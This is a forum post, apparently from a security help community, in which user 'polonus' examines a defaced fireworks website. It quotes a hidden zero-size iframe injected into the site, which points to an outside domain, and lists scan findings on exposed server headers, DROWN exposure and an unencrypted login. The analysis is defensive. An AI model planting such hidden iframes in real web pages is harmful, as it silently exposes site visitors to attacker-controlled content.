Hacked and defaced website with hidden iFrame detected?

[polonus]

See: http://killmalware.com/bigbombfireworks.com/#
iframes
Any iframes? Yes there are.

<iframe width="0" height="0" src="-http://evmjuarez.com/x7ZDuTA-53c&amp;autoplay=1.htm" frameborder="0"></iframe> *
Re: http://toolbar.netcraft.com/site_report?url=http://bigbombfireworks.com
Shun this site as it has very poor rating: https://www.mywot.com/en/scorecard/p3nlhg328c1328.shr.prod.phx3.secureserver.net?utm_source=addon&utm_content=rw-viewsc
GoDaddy abuse: http://toolbar.netcraft.com/site_report?url=http://p3nlhg328c1328.shr.prod.phx3.secureserver.net
and DROWn vulnerable: https://test.drownattack.com/?site=http%3A%2F%2Fp3nlhg328c1328.shr.prod.phx3.secureserver.net%2F

On that iFrame destination * see: https://seomon.com/domain/evmjuarez.com/

Overview
By default, excessive information about the server and frameworks used by a Apache application are returned in the response headers. These headers can be used to help identify security flaws which may exist as a result of the choice of technology exposed in these headers.

Result
The address you entered is unnecessarily exposing the following response headers which divulge its choice of web platform:

Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4

Configuring the application to not return unnecessary headers keeps this information silent and makes it significantly more difficult to identify the underlying frameworks.

On the external link http://toolbar.netcraft.com/site_report?url=http://up.harajgulf.com
we find insecure log-in http://up.harajgulf.com/do.php?img= (on txt log-in)
Alerts (1)
Insecure login (1)
Password will be transmited in clear to -http://up.harajgulf.com/ucp.php?go=login
Infos (1)
Encryption (HTTPS) (1)
Communication is NOT encrypted

polonus